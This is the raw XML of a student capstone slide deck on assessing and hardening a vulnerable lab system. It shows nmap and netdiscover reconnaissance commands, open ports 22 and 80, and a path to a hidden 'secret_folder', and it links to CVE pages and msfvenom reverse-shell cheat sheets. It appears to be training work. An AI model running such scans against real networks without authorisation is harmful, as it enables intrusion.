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0" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId40"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId41"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="296" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="285" r:id="rId9"/>
    <p:sldId id="288" r:id="rId10"/>
    <p:sldId id="290" r:id="rId11"/>
    <p:sldId id="291" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="292" r:id="rId14"/>
    <p:sldId id="264" r:id="rId15"/>
    <p:sldId id="287" r:id="rId16"/>
    <p:sldId id="293" r:id="rId17"/>
    <p:sldId id="266" r:id="rId18"/>
    <p:sldId id="267" r:id="rId19"/>
    <p:sldId id="268" r:id="rId20"/>
    <p:sldId id="269" r:id="rId21"/>
    <p:sldId id="270" r:id="rId22"/>
    <p:sldId id="271" r:id="rId23"/>
    <p:sldId id="272" r:id="rId24"/>
    <p:sldId id="273" r:id="rId25"/>
    <p:sldId id="274" r:id="rId26"/>
    <p:sldId id="275" r:id="rId27"/>
    <p:sldId id="276" r:id="rId28"/>
    <p:sldId id="278" r:id="rId29"/>
    <p:sldId id="279" r:id="rId30"/>
    <p:sldId id="280" r:id="rId31"/>
    <p:sldId id="281" r:id="rId32"/>
    <p:sldId id="298" r:id="rId33"/>
    <p:sldId id="299" r:id="rId34"/>
    <p:sldId id="300" r:id="rId35"/>
    <p:sldId id="258" r:id="rId36"/>
    <p:sldId id="297" r:id="rId37"/>
    <p:sldId id="294" r:id="rId38"/>
    <p:sldId id="277" r:id="rId39"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
      <p:bold r:id="rId42"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Consolas" panose="020B0609020204030204" pitchFamily="49"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Roboto Black" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId51"/>
      <p:bold r:id="rId52"/>
      <p:boldItalic r:id="rId53"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId54"/>
      <p:bold r:id="rId55"/>
      <p:italic r:id="rId56"/>
      <p:boldItalic r:id="rId57"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId58"/>
      <p:bold r:id="rId59"/>
      <p:italic r:id="rId60"/>
      <p:boldItalic r:id="rId61"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId62"/>
      <p:bold r:id="rId63"/>
      <p:italic r:id="rId64"/>
      <p:boldItalic r:id="rId65"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>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tan Vithal Patel" initials="KVP" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="4ef4b6b9a78864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3D85C6"/>
    <a:srgbClr val="7030A0"/>
    <a:srgbClr val="00B0F0"/>
    <a:srgbClr val="92D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400C15-705A-4B7E-AC61-6032BE286A16}">
  <a:tblStyle styleId="{EB400C15-705A-4B7E-AC61-6032BE286A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144" d="100"/>
          <a:sy n="144" d="100"/>
        </p:scale>
        <p:origin x="654" y="120"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz"/>
        <p:guide orient="horz" pos="2232"/>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EEB274-AB77-4113-9096-2272C07705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id="{D8115A24-337C-4583-A64C-B84DC366DB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79364D-D0E5-493D-ACD3-3C068261D29A}" type="datetimeFigureOut">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>2021-09-21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{904F1DA8-1908-48B4-BBFD-F9687EF253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CA" dirty="0"/>
              <a:t>Ketan V. Patel – August 2021</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF067E77-F912-4459-80DE-5282897CEA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C48350-C100-453F-B0DF-5371D543BD31}" type="slidenum">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102078247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9978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848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169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4652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0957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25135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7503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842894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5149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6647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dirty="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dirty="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dirty="0">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dirty="0">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dirty="0">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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="0"/>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dirty="0"/>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8" r:id="rId30"/>
    <p:sldLayoutId id="2147483679"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3" r:id="rId43"/>
    <p:sldLayoutId id="2147483694" r:id="rId44"/>
    <p:sldLayoutId id="2147483695" r:id="rId45"/>
    <p:sldLayoutId id="2147483696" r:id="rId46"/>
    <p:sldLayoutId id="2147483697" r:id="rId47"/>
    <p:sldLayoutId id="2147483698" r:id="rId48"/>
    <p:sldLayoutId id="2147483699" r:id="rId49"/>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nvd.nist.gov/vuln/detail/CVE-2019-6579"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hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2019-6579" TargetMode="External"/><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hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2019-13386"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hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-31783"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1.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crackstation.net/" TargetMode="Externa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cwe.mitre.org/index.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dummies.com/programming/networking/prevent-network-hacking-with-port-scanners/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crackstation.net/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://help.sonicwall.com/help/sw/eng/9530/26/2/3/content/Application_Control.065.23.htm" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nist.gov/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://infinitelogins.com/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/548.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.security.org/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.stackpath.com/?_ga=2.129226828.1391841379.1629388836-375546789.1628698971" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2019-6579" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/controls/Blocking_Brute_Force_Attacks" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout12.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-31783" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://howsecureismypassword.net/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.stackpath.com/hc/en-us/articles/360001091666" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2019-13386" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackexchange.com/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.passcamp.com/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-24227" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://superuser.com/questions/769814/how-to-block-all-ports-except-80-443-with-iptables" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2007-0450" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2019-5437" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unix.stackexchange.com/questions/345114/how-to-protect-against-port-scanners" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/frizb/MSF-Venom-Cheatsheet" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.passcamp.com/blog/dangers-of-storing-and-sharing-passwords-in-plaintext/"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nvd.nist.gov/vuln/detail/CVE-2019-6579"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nvd.nist.gov/vuln/detail/CVE-2019-13386" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2007-045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nvd.nist.gov/vuln/detail/CVE-2021-31783" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crackstation.ne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nvd.nist.gov/vuln/detail/CVE-2020-24227" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2019-5437" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/548.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Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Capstone Engagement</a:t>
            </a:r>
            <a:endParaRPr sz="3100" dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Assessment, Analysis, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>and Hardening of a Vulnerable System</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="3100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Prepared by: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3100" b="1" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Ketan Vithal Patel</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3100" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>August 2021</a:t>
            </a:r>
            <a:endParaRPr sz="3100" i="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F9F2E6F-AC61-4F73-830D-2AB077869C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latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Open Web Port (80) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>CVE-2019-6579</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1091" name="Google Shape;1091;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480574"/>
            <a:ext cx="2428500" cy="3378445"/>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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480623"/>
            <a:ext cx="2371500" cy="3378395"/>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mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>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I used nmap to scan for open ports on the target machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Commands used : </a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>netdiscover –r 192.168.1.255/16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>nmap –sV 192.168.1.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>nmap –sS –A 192.168.1.105</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>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000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>WEBSERVER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>192.168.1.105/meet_our_team/ashton.txt</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480625"/>
            <a:ext cx="2495176"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mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a: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Nmap scanned 256 IP addresses: I found 4 hosts up:</a:t>
            </a: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Port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> are open and was of interest to me.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>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The discovered files on</a:t>
            </a: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meet_our_team/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ashton.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>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The ashton.txt allowed the</a:t>
            </a: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discovery of the secret folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>at</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/company_folders/secret_folder</a:t>
            </a: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Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
